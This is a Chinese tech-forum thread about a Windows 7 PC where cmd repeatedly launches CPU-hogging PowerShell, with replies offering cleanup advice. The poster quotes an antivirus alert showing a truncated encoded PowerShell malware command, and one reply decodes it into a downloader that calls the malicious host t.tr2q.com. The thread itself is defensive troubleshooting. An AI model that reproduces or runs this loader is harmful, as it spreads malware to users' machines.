昨天发现的, win7 被一堆“cmd 发起的 powershell”在后台疯狂占 cpu
devwolf · 2019-12-31 09:15:55 +08:00 · 2999 次点击这是一个创建于 1774 天前的主题,其中的信息可能已经有所发展或是发生改变。
毒霸是这样说的:“可疑程序运行后,可能会静默安装恶意软件,导致系统异常,建议您立即阻止。 行为发起 :C:\Windows\system32\cmd.EXE 可疑进程 :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 可疑内容 :powershell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ”
去金山那边查查,10 月份就有人反映了,但看起来是没解决 http://bbs.duba.net/thread-4191273570-1-1.html
相关的科普查了一下这个 https://www.freebuf.com/articles/network/216918.html 和这篇文中描述很像,一小时一次。
——当然,最快的法子是重装系统,但因为要搬数据,索性换电脑了(从小新 pro13 加到了联想拯救者然后跌回惠普星系列,上报时被主管强推硬是改成了戴尔游匣)。
3 号才到,旧笔记本还得撑一会儿,想让旧笔记本死个明白,求告知解决方案
目前已经试过的法子:照着网上能搜到的禁用 powershell 的法子,将所有人替换为了 admin,拿掉了 system 的权限,但还是时间一到,毒霸提示"cmd 又把 powshell 放出来吃 cpu 了"
12 条回复 • 2019-12-31 16:34:45 +08:00
 |
1
BFDZ 2019-12-31 09:25:10 +08:00
进安全模式,用大蜘蛛扫描器全盘扫一遍
http://download.geo.drweb.com/pub/drweb/cureit/cureit.exe |
 |
2
w292614191 2019-12-31 09:54:22 +08:00
到 ‘我告诉你’ 去下载个系统?
不要使用 ‘番茄家园、雨林木风、老毛桃。。。。。。’ |
 |
3
rssf 2019-12-31 09:57:06 +08:00 via iPhone
毒霸自己不就是个占用系统资源的病毒
|
 |
4
dxgundam01 2019-12-31 09:58:54 +08:00
明显就是中毒啦,感觉重装啊
|
 |
5
devwolf OP 楼上说的没错——
因为公司网速问题,大蜘蛛还没下好,先下了同事推荐的火绒。结果火绒一查,毒霸自己就是个开后门的二五仔,过会儿看看解决没 |
 |
6
zhuangku556 2019-12-31 10:09:15 +08:00  1
还敢用金山系软件啊。。。
|
|
7
devwolf OP https://www.landiannews.com/archives/67551.html
竟然是这个月 6 号的消息,还挺新的,解释了上面 5 楼 发现火绒能抓到金山这些后门。 6 楼 提到的也是,单纯因为之前那么多问题只要没轮到自己头上,就没换、关心的也少, 。。。笔者本身是挺缺少防患于未然的意识。 |
 |
8
jin7 2019-12-31 14:04:31 +08:00
用 win10 自带的杀毒就保平安
|
 |
9
Buges 2019-12-31 14:45:54 +08:00 via Android 1
$ echo JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ | base64 -d
$ L e m o n _ D u c k = ' l D C Q h Z t ' ; $ y = ' h t t p : / / t . t r 2 q . c o m / v . j s ' ; $ z = $ y + ' p ' + ' ? m i g _ 2 0 1 9 1 2 3 0 ' ; $ m = ( N e w - O b j base64: invalid input |
|
10
Buges 2019-12-31 14:47:08 +08:00 via Android
可以先把 t.tr2q.com 加到 hosts
|
|
11
devwolf OP 感谢大伙儿的热情相助。
所幸,笔者这边试着用火绒干掉一些扫出的病毒后,看上去是没再出现 powershell 了。姑且记作一个 win7 出现该问题的解决办法吧。 关于 8 楼 提到的,肯定的,下个新电脑笔者老老实实用 win10 了。 最后,祝各位元旦快乐。 |
 |
12
cutlove 2019-12-31 16:34:45 +08:00
火绒再得一分
|
Select Language